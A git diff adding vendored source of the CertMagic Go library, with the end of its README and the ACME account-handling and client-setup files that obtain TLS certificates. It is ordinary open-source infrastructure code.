- [`CacheUnmanagedCertificatePEMBytes()`](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#Config.CacheUnmanagedCertificatePEMBytes)
|
||||
- [`CacheUnmanagedCertificatePEMFile()`](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#Config.CacheUnmanagedCertificatePEMFile)
|
||||
- [`CacheUnmanagedTLSCertificate()`](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#Config.CacheUnmanagedTLSCertificate)
|
||||
|
||||
Keep in mind that unmanaged certificates are (obviously) not renewed for you, so you'll have to replace them when you do. However, OCSP stapling is performed even for unmanaged certificates that qualify.
|
||||
|
||||
|
||||
### Does CertMagic obtain SAN certificates?
|
||||
|
||||
Technically all certificates these days are SAN certificates because CommonName is deprecated. But if you're asking whether CertMagic issues and manages certificates with multiple SANs, the answer is no. But it does support serving them, if you provide your own.
|
||||
|
||||
|
||||
### How can I listen on ports 80 and 443? Do I have to run as root?
|
||||
|
||||
On Linux, you can use `setcap` to grant your binary the permission to bind low ports:
|
||||
|
||||
```bash
|
||||
$ sudo setcap cap_net_bind_service=+ep /path/to/your/binary
|
||||
```
|
||||
|
||||
and then you will not need to run with root privileges.
|
||||
|
||||
|
||||
## Contributing
|
||||
|
||||
We welcome your contributions! Please see our **[contributing guidelines](https://github.com/caddyserver/certmagic/blob/master/.github/CONTRIBUTING.md)** for instructions.
|
||||
|
||||
|
||||
## Project History
|
||||
|
||||
CertMagic is the core of Caddy's advanced TLS automation code, extracted into a library. The underlying ACME client implementation is [ACMEz](https://github.com/mholt/acmez). CertMagic's code was originally a central part of Caddy even before Let's Encrypt entered public beta in 2015.
|
||||
|
||||
In the years since then, Caddy's TLS automation techniques have been widely adopted, tried and tested in production, and served millions of sites and secured trillions of connections.
|
||||
|
||||
Now, CertMagic is _the actual library used by Caddy_. It's incredibly powerful and feature-rich, but also easy to use for simple Go programs: one line of code can enable fully-automated HTTPS applications with HTTP->HTTPS redirects.
|
||||
|
||||
Caddy is known for its robust HTTPS+ACME features. When ACME certificate authorities have had outages, in some cases Caddy was the only major client that didn't experience any downtime. Caddy can weather OCSP outages lasting days, or CA outages lasting weeks, without taking your sites offline.
|
||||
|
||||
Caddy was also the first to sport "on-demand" issuance technology, which obtains certificates during the first TLS handshake for an allowed SNI name.
|
||||
|
||||
Consequently, CertMagic brings all these (and more) features and capabilities right into your own Go programs.
|
||||
|
||||
You can [watch a 2016 dotGo talk](https://www.dotconferences.com/2016/10/matthew-holt-go-with-acme) by the author of this library about using ACME to automate certificate management in Go programs:
|
||||
|
||||
[](https://www.dotconferences.com/2016/10/matthew-holt-go-with-acme)
|
||||
|
||||
|
||||
|
||||
## Credits and License
|
||||
|
||||
CertMagic is a project by [Matthew Holt](https://twitter.com/mholt6), who is the author; and various contributors, who are credited in the commit history of either CertMagic or Caddy.
|
||||
|
||||
CertMagic is licensed under Apache 2.0, an open source license. For convenience, its main points are summarized as follows (but this is no replacement for the actual license text):
|
||||
|
||||
- The author owns the copyright to this code
|
||||
- Use, distribute, and modify the software freely
|
||||
- Private and internal use is allowed
|
||||
- License text and copyright notices must stay intact and be included with distributions
|
||||
- Any and all changes to the code must be documented
|
410
vendor/github.com/caddyserver/certmagic/account.go
generated
vendored
Normal file
@ -0,0 +1,410 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"bytes"
|
||||
"context"
|
||||
"crypto/ecdsa"
|
||||
"crypto/elliptic"
|
||||
"crypto/rand"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"io/fs"
|
||||
"os"
|
||||
"path"
|
||||
"sort"
|
||||
"strings"
|
||||
"sync"
|
||||
|
||||
"github.com/mholt/acmez/acme"
|
||||
)
|
||||
|
||||
// getAccount either loads or creates a new account, depending on if
|
||||
// an account can be found in storage for the given CA + email combo.
|
||||
func (am *ACMEIssuer) getAccount(ctx context.Context, ca, email string) (acme.Account, error) {
|
||||
acct, err := am.loadAccount(ctx, ca, email)
|
||||
if errors.Is(err, fs.ErrNotExist) {
|
||||
return am.newAccount(email)
|
||||
}
|
||||
return acct, err
|
||||
}
|
||||
|
||||
// loadAccount loads an account from storage, but does not create a new one.
|
||||
func (am *ACMEIssuer) loadAccount(ctx context.Context, ca, email string) (acme.Account, error) {
|
||||
regBytes, err := am.config.Storage.Load(ctx, am.storageKeyUserReg(ca, email))
|
||||
if err != nil {
|
||||
return acme.Account{}, err
|
||||
}
|
||||
keyBytes, err := am.config.Storage.Load(ctx, am.storageKeyUserPrivateKey(ca, email))
|
||||
if err != nil {
|
||||
return acme.Account{}, err
|
||||
}
|
||||
|
||||
var acct acme.Account
|
||||
err = json.Unmarshal(regBytes, &acct)
|
||||
if err != nil {
|
||||
return acct, err
|
||||
}
|
||||
acct.PrivateKey, err = PEMDecodePrivateKey(keyBytes)
|
||||
if err != nil {
|
||||
return acct, fmt.Errorf("could not decode account's private key: %v", err)
|
||||
}
|
||||
|
||||
return acct, nil
|
||||
}
|
||||
|
||||
// newAccount generates a new private key for a new ACME account, but
|
||||
// it does not register or save the account.
|
||||
func (*ACMEIssuer) newAccount(email string) (acme.Account, error) {
|
||||
var acct acme.Account
|
||||
if email != "" {
|
||||
acct.Contact = []string{"mailto:" + email} // TODO: should we abstract the contact scheme?
|
||||
}
|
||||
privateKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
|
||||
if err != nil {
|
||||
return acct, fmt.Errorf("generating private key: %v", err)
|
||||
}
|
||||
acct.PrivateKey = privateKey
|
||||
return acct, nil
|
||||
}
|
||||
|
||||
// GetAccount first tries loading the account with the associated private key from storage.
|
||||
// If it does not exist in storage, it will be retrieved from the ACME server and added to storage.
|
||||
// The account must already exist; it does not create a new account.
|
||||
func (am *ACMEIssuer) GetAccount(ctx context.Context, privateKeyPEM []byte) (acme.Account, error) {
|
||||
account, err := am.loadAccountByKey(ctx, privateKeyPEM)
|
||||
if errors.Is(err, fs.ErrNotExist) {
|
||||
account, err = am.lookUpAccount(ctx, privateKeyPEM)
|
||||
}
|
||||
return account, err
|
||||
}
|
||||
|
||||
// loadAccountByKey loads the account with the given private key from storage, if it exists.
|
||||
// If it does not exist, an error of type fs.ErrNotExist is returned. This is not very efficient
|
||||
// for lots of accounts.
|
||||
func (am *ACMEIssuer) loadAccountByKey(ctx context.Context, privateKeyPEM []byte) (acme.Account, error) {
|
||||
accountList, err := am.config.Storage.List(ctx, am.storageKeyUsersPrefix(am.CA), false)
|
||||
if err != nil {
|
||||
return acme.Account{}, err
|
||||
}
|
||||
for _, accountFolderKey := range accountList {
|
||||
email := path.Base(accountFolderKey)
|
||||
keyBytes, err := am.config.Storage.Load(ctx, am.storageKeyUserPrivateKey(am.CA, email))
|
||||
if err != nil {
|
||||
return acme.Account{}, err
|
||||
}
|
||||
if bytes.Equal(bytes.TrimSpace(keyBytes), bytes.TrimSpace(privateKeyPEM)) {
|
||||
return am.loadAccount(ctx, am.CA, email)
|
||||
}
|
||||
}
|
||||
return acme.Account{}, fs.ErrNotExist
|
||||
}
|
||||
|
||||
// lookUpAccount looks up the account associated with privateKeyPEM from the ACME server.
|
||||
// If the account is found by the server, it will be saved to storage and returned.
|
||||
func (am *ACMEIssuer) lookUpAccount(ctx context.Context, privateKeyPEM []byte) (acme.Account, error) {
|
||||
client, err := am.newACMEClient(false)
|
||||
if err != nil {
|
||||
return acme.Account{}, fmt.Errorf("creating ACME client: %v", err)
|
||||
}
|
||||
|
||||
privateKey, err := PEMDecodePrivateKey([]byte(privateKeyPEM))
|
||||
if err != nil {
|
||||
return acme.Account{}, fmt.Errorf("decoding private key: %v", err)
|
||||
}
|
||||
|
||||
// look up the account
|
||||
account := acme.Account{PrivateKey: privateKey}
|
||||
account, err = client.GetAccount(ctx, account)
|
||||
if err != nil {
|
||||
return acme.Account{}, fmt.Errorf("looking up account with server: %v", err)
|
||||
}
|
||||
|
||||
// save the account details to storage
|
||||
err = am.saveAccount(ctx, client.Directory, account)
|
||||
if err != nil {
|
||||
return account, fmt.Errorf("could not save account to storage: %v", err)
|
||||
}
|
||||
|
||||
return account, nil
|
||||
}
|
||||
|
||||
// saveAccount persists an ACME account's info and private key to storage.
|
||||
// It does NOT register the account via ACME or prompt the user.
|
||||
func (am *ACMEIssuer) saveAccount(ctx context.Context, ca string, account acme.Account) error {
|
||||
regBytes, err := json.MarshalIndent(account, "", "\t")
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
keyBytes, err := PEMEncodePrivateKey(account.PrivateKey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
// extract primary contact (email), without scheme (e.g. "mailto:")
|
||||
primaryContact := getPrimaryContact(account)
|
||||
all := []keyValue{
|
||||
{
|
||||
key: am.storageKeyUserReg(ca, primaryContact),
|
||||
value: regBytes,
|
||||
},
|
||||
{
|
||||
key: am.storageKeyUserPrivateKey(ca, primaryContact),
|
||||
value: keyBytes,
|
||||
},
|
||||
}
|
||||
return storeTx(ctx, am.config.Storage, all)
|
||||
}
|
||||
|
||||
// getEmail does everything it can to obtain an email address
|
||||
// from the user within the scope of memory and storage to use
|
||||
// for ACME TLS. If it cannot get an email address, it does nothing
|
||||
// (If user is prompted, it will warn the user of
|
||||
// the consequences of an empty email.) This function MAY prompt
|
||||
// the user for input. If allowPrompts is false, the user
|
||||
// will NOT be prompted and an empty email may be returned.
|
||||
func (am *ACMEIssuer) getEmail(ctx context.Context, allowPrompts bool) error {
|
||||
leEmail := am.Email
|
||||
|
||||
// First try package default email, or a discovered email address
|
||||
if leEmail == "" {
|
||||
leEmail = DefaultACME.Email
|
||||
}
|
||||
if leEmail == "" {
|
||||
discoveredEmailMu.Lock()
|
||||
leEmail = discoveredEmail
|
||||
discoveredEmailMu.Unlock()
|
||||
}
|
||||
|
||||
// Then try to get most recent user email from storage
|
||||
var gotRecentEmail bool
|
||||
if leEmail == "" {
|
||||
leEmail, gotRecentEmail = am.mostRecentAccountEmail(ctx, am.CA)
|
||||
}
|
||||
if !gotRecentEmail && leEmail == "" && allowPrompts {
|
||||
// Looks like there is no email address readily available,
|
||||
// so we will have to ask the user if we can.
|
||||
var err error
|
||||
leEmail, err = am.promptUserForEmail()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// User might have just signified their agreement
|
||||
am.Agreed = DefaultACME.Agreed
|
||||
}
|
||||
|
||||
// save the email for later and ensure it is consistent
|
||||
// for repeated use; then update cfg with the email
|
||||
leEmail = strings.TrimSpace(strings.ToLower(leEmail))
|
||||
discoveredEmailMu.Lock()
|
||||
if discoveredEmail == "" {
|
||||
discoveredEmail = leEmail
|
||||
}
|
||||
discoveredEmailMu.Unlock()
|
||||
am.Email = leEmail
|
||||
|
||||
return nil
|
||||
}
|
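The lookup order implemented by getEmail above (explicit Email, then DefaultACME.Email, then a previously discovered address, then the most recent account in storage, then a prompt) means unattended deployments should set the address and agreement up front. A minimal sketch, assuming the exported certmagic API and a hypothetical domain and address:

package main

import "github.com/caddyserver/certmagic"

func main() {
	// With these set, getEmail never needs to prompt on stdin.
	certmagic.DefaultACME.Email = "admin@example.com" // hypothetical address
	certmagic.DefaultACME.Agreed = true               // agree to the CA's terms non-interactively

	// Obtain and keep certificates renewed for the listed names.
	if err := certmagic.HTTPS([]string{"example.com"}, nil); err != nil {
		panic(err)
	}
}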
||||
|
||||
// promptUserForEmail prompts the user for an email address
|
||||
// and returns the email address they entered (which could
|
||||
// be the empty string). If no error is returned, then Agreed
|
||||
// will also be set to true, since continuing through the
|
||||
// prompt signifies agreement.
|
||||
func (am *ACMEIssuer) promptUserForEmail() (string, error) {
|
||||
// prompt the user for an email address and terms agreement
|
||||
reader := bufio.NewReader(stdin)
|
||||
am.promptUserAgreement("")
|
||||
fmt.Println("Please enter your email address to signify agreement and to be notified")
|
||||
fmt.Println("in case of issues. You can leave it blank, but we don't recommend it.")
|
||||
fmt.Print(" Email address: ")
|
||||
leEmail, err := reader.ReadString('\n')
|
||||
if err != nil && err != io.EOF {
|
||||
return "", fmt.Errorf("reading email address: %v", err)
|
||||
}
|
||||
leEmail = strings.TrimSpace(leEmail)
|
||||
DefaultACME.Agreed = true
|
||||
return leEmail, nil
|
||||
}
|
||||
|
||||
// promptUserAgreement simply outputs the standard user
|
||||
// agreement prompt with the given agreement URL.
|
||||
// It outputs a newline after the message.
|
||||
func (am *ACMEIssuer) promptUserAgreement(agreementURL string) {
|
||||
userAgreementPrompt := `Your sites will be served over HTTPS automatically using an automated CA.
|
||||
By continuing, you agree to the CA's terms of service`
|
||||
if agreementURL == "" {
|
||||
fmt.Printf("\n\n%s.\n", userAgreementPrompt)
|
||||
return
|
||||
}
|
||||
fmt.Printf("\n\n%s at:\n %s\n", userAgreementPrompt, agreementURL)
|
||||
}
|
||||
|
||||
// askUserAgreement prompts the user to agree to the agreement
|
||||
// at the given agreement URL via stdin. It returns whether the
|
||||
// user agreed or not.
|
||||
func (am *ACMEIssuer) askUserAgreement(agreementURL string) bool {
|
||||
am.promptUserAgreement(agreementURL)
|
||||
fmt.Print("Do you agree to the terms? (y/n): ")
|
||||
|
||||
reader := bufio.NewReader(stdin)
|
||||
answer, err := reader.ReadString('\n')
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
answer = strings.ToLower(strings.TrimSpace(answer))
|
||||
|
||||
return answer == "y" || answer == "yes"
|
||||
}
|
||||
|
||||
func storageKeyACMECAPrefix(issuerKey string) string {
|
||||
return path.Join(prefixACME, StorageKeys.Safe(issuerKey))
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) storageKeyCAPrefix(caURL string) string {
|
||||
return storageKeyACMECAPrefix(am.issuerKey(caURL))
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) storageKeyUsersPrefix(caURL string) string {
|
||||
return path.Join(am.storageKeyCAPrefix(caURL), "users")
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) storageKeyUserPrefix(caURL, email string) string {
|
||||
if email == "" {
|
||||
email = emptyEmail
|
||||
}
|
||||
return path.Join(am.storageKeyUsersPrefix(caURL), StorageKeys.Safe(email))
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) storageKeyUserReg(caURL, email string) string {
|
||||
return am.storageSafeUserKey(caURL, email, "registration", ".json")
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) storageKeyUserPrivateKey(caURL, email string) string {
|
||||
return am.storageSafeUserKey(caURL, email, "private", ".key")
|
||||
}
|
||||
|
||||
// storageSafeUserKey returns a key for the given email, with the default
|
||||
// filename, and the filename ending in the given extension.
|
||||
func (am *ACMEIssuer) storageSafeUserKey(ca, email, defaultFilename, extension string) string {
|
||||
if email == "" {
|
||||
email = emptyEmail
|
||||
}
|
||||
email = strings.ToLower(email)
|
||||
filename := am.emailUsername(email)
|
||||
if filename == "" {
|
||||
filename = defaultFilename
|
||||
}
|
||||
filename = StorageKeys.Safe(filename)
|
||||
return path.Join(am.storageKeyUserPrefix(ca, email), filename+extension)
|
||||
}
|
||||
|
||||
// emailUsername returns the username portion of an email address (part before
|
||||
// '@') or the original input if it can't find the "@" symbol.
|
||||
func (*ACMEIssuer) emailUsername(email string) string {
|
||||
at := strings.Index(email, "@")
|
||||
if at == -1 {
|
||||
return email
|
||||
} else if at == 0 {
|
||||
return email[1:]
|
||||
}
|
||||
return email[:at]
|
||||
}
|
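Taken together, the helpers above lay out per-account assets beneath the issuer's storage prefix. As a rough illustration (hypothetical address, Let's Encrypt production directory), the registration and private key would be stored under keys similar to:

    acme/acme-v02.api.letsencrypt.org-directory/users/user@example.com/user.json
    acme/acme-v02.api.letsencrypt.org-directory/users/user@example.com/user.key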
||||
|
||||
// mostRecentAccountEmail finds the most recently-written account file
|
||||
// in storage. Since this is part of a complex sequence to get a user
|
||||
// account, errors here are discarded to simplify code flow in
|
||||
// the caller, and errors are not important here anyway.
|
||||
func (am *ACMEIssuer) mostRecentAccountEmail(ctx context.Context, caURL string) (string, bool) {
|
||||
accountList, err := am.config.Storage.List(ctx, am.storageKeyUsersPrefix(caURL), false)
|
||||
if err != nil || len(accountList) == 0 {
|
||||
return "", false
|
||||
}
|
||||
|
||||
// get all the key infos ahead of sorting, because
|
||||
// we might filter some out
|
||||
stats := make(map[string]KeyInfo)
|
||||
for i := 0; i < len(accountList); i++ {
|
||||
u := accountList[i]
|
||||
keyInfo, err := am.config.Storage.Stat(ctx, u)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
if keyInfo.IsTerminal {
|
||||
// I found a bug when macOS created a .DS_Store file in
|
||||
// the users folder, and CertMagic tried to use that as
|
||||
// the user email because it was newer than the other one
|
||||
// which existed... sure, this isn't a perfect fix but
|
||||
// frankly one's OS shouldn't mess with the data folder
|
||||
// in the first place.
|
||||
accountList = append(accountList[:i], accountList[i+1:]...)
|
||||
i--
|
||||
continue
|
||||
}
|
||||
stats[u] = keyInfo
|
||||
}
|
||||
|
||||
sort.Slice(accountList, func(i, j int) bool {
|
||||
iInfo := stats[accountList[i]]
|
||||
jInfo := stats[accountList[j]]
|
||||
return jInfo.Modified.Before(iInfo.Modified)
|
||||
})
|
||||
|
||||
if len(accountList) == 0 {
|
||||
return "", false
|
||||
}
|
||||
|
||||
account, err := am.getAccount(ctx, caURL, path.Base(accountList[0]))
|
||||
if err != nil {
|
||||
return "", false
|
||||
}
|
||||
|
||||
return getPrimaryContact(account), true
|
||||
}
|
||||
|
||||
// getPrimaryContact returns the first contact on the account (if any)
|
||||
// without the scheme. (I guess we assume an email address.)
|
||||
func getPrimaryContact(account acme.Account) string {
|
||||
// TODO: should this be abstracted with some lower-level helper?
|
||||
var primaryContact string
|
||||
if len(account.Contact) > 0 {
|
||||
primaryContact = account.Contact[0]
|
||||
if idx := strings.Index(primaryContact, ":"); idx >= 0 {
|
||||
primaryContact = primaryContact[idx+1:]
|
||||
}
|
||||
}
|
||||
return primaryContact
|
||||
}
|
||||
|
||||
// When an email address is not explicitly specified, we can remember
|
||||
// the last one we discovered to avoid having to ask again later.
|
||||
// (We used to store this in DefaultACME.Email but it was racey; see #127)
|
||||
var (
|
||||
discoveredEmail string
|
||||
discoveredEmailMu sync.Mutex
|
||||
)
|
||||
|
||||
// stdin is used to read the user's input if prompted;
|
||||
// this is changed by tests during tests.
|
||||
var stdin = io.ReadWriter(os.Stdin)
|
||||
|
||||
// The name of the folder for accounts where the email
|
||||
// address was not provided; default 'username' if you will,
|
||||
// but only for local/storage use, not with the CA.
|
||||
const emptyEmail = "default"
|
384
vendor/github.com/caddyserver/certmagic/acmeclient.go
generated
vendored
Normal file
@ -0,0 +1,384 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/tls"
|
||||
"crypto/x509"
|
||||
"fmt"
|
||||
weakrand "math/rand"
|
||||
"net"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"strconv"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/mholt/acmez"
|
||||
"github.com/mholt/acmez/acme"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
func init() {
|
||||
weakrand.Seed(time.Now().UnixNano())
|
||||
}
|
||||
|
||||
// acmeClient holds state necessary to perform ACME operations
|
||||
// for certificate management with an ACME account. Call
|
||||
// ACMEIssuer.newACMEClientWithAccount() to get a valid one.
|
||||
type acmeClient struct {
|
||||
iss *ACMEIssuer
|
||||
acmeClient *acmez.Client
|
||||
account acme.Account
|
||||
}
|
||||
|
||||
// newACMEClientWithAccount creates an ACME client ready to use with an account, including
|
||||
// loading one from storage or registering a new account with the CA if necessary. If
|
||||
// useTestCA is true, am.TestCA will be used if set; otherwise, the primary CA will be used.
|
||||
func (iss *ACMEIssuer) newACMEClientWithAccount(ctx context.Context, useTestCA, interactive bool) (*acmeClient, error) {
|
||||
// first, get underlying ACME client
|
||||
client, err := iss.newACMEClient(useTestCA)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// look up or create the ACME account
|
||||
var account acme.Account
|
||||
if iss.AccountKeyPEM != "" {
|
||||
account, err = iss.GetAccount(ctx, []byte(iss.AccountKeyPEM))
|
||||
} else {
|
||||
account, err = iss.getAccount(ctx, client.Directory, iss.Email)
|
||||
}
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("getting ACME account: %v", err)
|
||||
}
|
||||
|
||||
// register account if it is new
|
||||
if account.Status == "" {
|
||||
if iss.NewAccountFunc != nil {
|
||||
account, err = iss.NewAccountFunc(ctx, iss, account)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("account pre-registration callback: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// agree to terms
|
||||
if interactive {
|
||||
if !iss.Agreed {
|
||||
var termsURL string
|
||||
dir, err := client.GetDirectory(ctx)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("getting directory: %w", err)
|
||||
}
|
||||
if dir.Meta != nil {
|
||||
termsURL = dir.Meta.TermsOfService
|
||||
}
|
||||
if termsURL != "" {
|
||||
iss.Agreed = iss.askUserAgreement(termsURL)
|
||||
if !iss.Agreed {
|
||||
return nil, fmt.Errorf("user must agree to CA terms")
|
||||
}
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// can't prompt a user who isn't there; they should
|
||||
// have reviewed the terms beforehand
|
||||
iss.Agreed = true
|
||||
}
|
||||
account.TermsOfServiceAgreed = iss.Agreed
|
||||
|
||||
// associate account with external binding, if configured
|
||||
if iss.ExternalAccount != nil {
|
||||
err := account.SetExternalAccountBinding(ctx, client.Client, *iss.ExternalAccount)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
}
|
||||
|
||||
// create account
|
||||
account, err = client.NewAccount(ctx, account)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("registering account %v with server: %w", account.Contact, err)
|
||||
}
|
||||
|
||||
// persist the account to storage
|
||||
err = iss.saveAccount(ctx, client.Directory, account)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("could not save account %v: %v", account.Contact, err)
|
||||
}
|
||||
}
|
||||
|
||||
c := &acmeClient{
|
||||
iss: iss,
|
||||
acmeClient: client,
|
||||
account: account,
|
||||
}
|
||||
|
||||
return c, nil
|
||||
}
|
||||
|
||||
// newACMEClient creates a new underlying ACME client using the settings in am,
|
||||
// independent of any particular ACME account. If useTestCA is true, am.TestCA
|
||||
// will be used if it is set; otherwise, the primary CA will be used.
|
||||
func (iss *ACMEIssuer) newACMEClient(useTestCA bool) (*acmez.Client, error) {
|
||||
// ensure defaults are filled in
|
||||
var caURL string
|
||||
if useTestCA {
|
||||
caURL = iss.TestCA
|
||||
}
|
||||
if caURL == "" {
|
||||
caURL = iss.CA
|
||||
}
|
||||
if caURL == "" {
|
||||
caURL = DefaultACME.CA
|
||||
}
|
||||
certObtainTimeout := iss.CertObtainTimeout
|
||||
if certObtainTimeout == 0 {
|
||||
certObtainTimeout = DefaultACME.CertObtainTimeout
|
||||
}
|
||||
|
||||
// ensure endpoint is secure (assume HTTPS if scheme is missing)
|
||||
if !strings.Contains(caURL, "://") {
|
||||
caURL = "https://" + caURL
|
||||
}
|
||||
u, err := url.Parse(caURL)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if u.Scheme != "https" && !isLoopback(u.Host) && !isInternal(u.Host) {
|
||||
return nil, fmt.Errorf("%s: insecure CA URL (HTTPS required)", caURL)
|
||||
}
|
||||
|
||||
// set up the dialers and resolver for the ACME client's HTTP client
|
||||
dialer := &net.Dialer{
|
||||
Timeout: 30 * time.Second,
|
||||
KeepAlive: 2 * time.Minute,
|
||||
}
|
||||
if iss.Resolver != "" {
|
||||
dialer.Resolver = &net.Resolver{
|
||||
PreferGo: true,
|
||||
Dial: func(ctx context.Context, network, _ string) (net.Conn, error) {
|
||||
return (&net.Dialer{
|
||||
Timeout: 15 * time.Second,
|
||||
}).DialContext(ctx, network, iss.Resolver)
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// TODO: we could potentially reuse the HTTP transport and client
|
||||
hc := iss.httpClient // TODO: is this racey?
|
||||
if iss.httpClient == nil {
|
||||
transport := &http.Transport{
|
||||
Proxy: http.ProxyFromEnvironment,
|
||||
DialContext: dialer.DialContext,
|
||||
TLSHandshakeTimeout: 30 * time.Second, // increase to 30s requested in #175
|
||||
ResponseHeaderTimeout: 30 * time.Second, // increase to 30s requested in #175
|
||||
ExpectContinueTimeout: 2 * time.Second,
|
||||
ForceAttemptHTTP2: true,
|
||||
}
|
||||
if iss.TrustedRoots != nil {
|
||||
transport.TLSClientConfig = &tls.Config{
|
||||
RootCAs: iss.TrustedRoots,
|
||||
}
|
||||
}
|
||||
|
||||
hc = &http.Client{
|
||||
Transport: transport,
|
||||
Timeout: HTTPTimeout,
|
||||
}
|
||||
|
||||
iss.httpClient = hc
|
||||
}
|
||||
|
||||
client := &acmez.Client{
|
||||
Client: &acme.Client{
|
||||
Directory: caURL,
|
||||
PollTimeout: certObtainTimeout,
|
||||
UserAgent: buildUAString(),
|
||||
HTTPClient: hc,
|
||||
},
|
||||
ChallengeSolvers: make(map[string]acmez.Solver),
|
||||
}
|
||||
if iss.Logger != nil {
|
||||
l := iss.Logger.Named("acme_client")
|
||||
client.Client.Logger, client.Logger = l, l
|
||||
}
|
||||
|
||||
// configure challenges (most of the time, DNS challenge is
|
||||
// exclusive of other ones because it is usually only used
|
||||
// in situations where the default challenges would fail)
|
||||
if iss.DNS01Solver == nil {
|
||||
// enable HTTP-01 challenge
|
||||
if !iss.DisableHTTPChallenge {
|
||||
useHTTPPort := HTTPChallengePort
|
||||
if HTTPPort > 0 && HTTPPort != HTTPChallengePort {
|
||||
useHTTPPort = HTTPPort
|
||||
}
|
||||
if iss.AltHTTPPort > 0 {
|
||||
useHTTPPort = iss.AltHTTPPort
|
||||
}
|
||||
client.ChallengeSolvers[acme.ChallengeTypeHTTP01] = distributedSolver{
|
||||
storage: iss.config.Storage,
|
||||
storageKeyIssuerPrefix: iss.storageKeyCAPrefix(client.Directory),
|
||||
solver: &httpSolver{
|
||||
acmeIssuer: iss,
|
||||
address: net.JoinHostPort(iss.ListenHost, strconv.Itoa(useHTTPPort)),
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// enable TLS-ALPN-01 challenge
|
||||
if !iss.DisableTLSALPNChallenge {
|
||||
useTLSALPNPort := TLSALPNChallengePort
|
||||
if HTTPSPort > 0 && HTTPSPort != TLSALPNChallengePort {
|
||||
useTLSALPNPort = HTTPSPort
|
||||
}
|
||||
if iss.AltTLSALPNPort > 0 {
|
||||
useTLSALPNPort = iss.AltTLSALPNPort
|
||||
}
|
||||
client.ChallengeSolvers[acme.ChallengeTypeTLSALPN01] = distributedSolver{
|
||||
storage: iss.config.Storage,
|
||||
storageKeyIssuerPrefix: iss.storageKeyCAPrefix(client.Directory),
|
||||
solver: &tlsALPNSolver{
|
||||
config: iss.config,
|
||||
address: net.JoinHostPort(iss.ListenHost, strconv.Itoa(useTLSALPNPort)),
|
||||
},
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// use DNS challenge exclusively
|
||||
client.ChallengeSolvers[acme.ChallengeTypeDNS01] = iss.DNS01Solver
|
||||
}
|
||||
|
||||
// wrap solvers in our wrapper so that we can keep track of challenge
|
||||
// info: this is useful for solving challenges globally as a process;
|
||||
// for example, usually there is only one process that can solve the
|
||||
// HTTP and TLS-ALPN challenges, and only one server in that process
|
||||
// that can bind the necessary port(s), so if a server listening on
|
||||
// a different port needed a certificate, it would have to know about
|
||||
// the other server listening on that port, and somehow convey its
|
||||
// challenge info or share its config, but this isn't always feasible;
|
||||
// what the wrapper does is it accesses a global challenge memory so
|
||||
// that unrelated servers in this process can all solve each others'
|
||||
// challenges without having to know about each other - Caddy's admin
|
||||
// endpoint uses this functionality since it and the HTTP/TLS modules
|
||||
// do not know about each other
|
||||
// (doing this here in a separate loop ensures that even if we expose
|
||||
// solver config to users later, we will wrap even their own solvers)
|
||||
for name, solver := range client.ChallengeSolvers {
|
||||
client.ChallengeSolvers[name] = solverWrapper{solver}
|
||||
}
|
||||
|
||||
return client, nil
|
||||
}
|
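As the comments inside newACMEClient note, setting a DNS01Solver makes the dns-01 challenge exclusive, and the HTTP-01 and TLS-ALPN-01 solvers are not configured at all. A hedged sketch of wiring one in; the provider value is a placeholder, not something defined in this diff:

// myDNSProvider is assumed to implement the libdns-style interfaces that
// certmagic.DNS01Solver expects; it is hypothetical and not part of this change.
certmagic.DefaultACME.DNS01Solver = &certmagic.DNS01Solver{
	DNSProvider: myDNSProvider,
}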
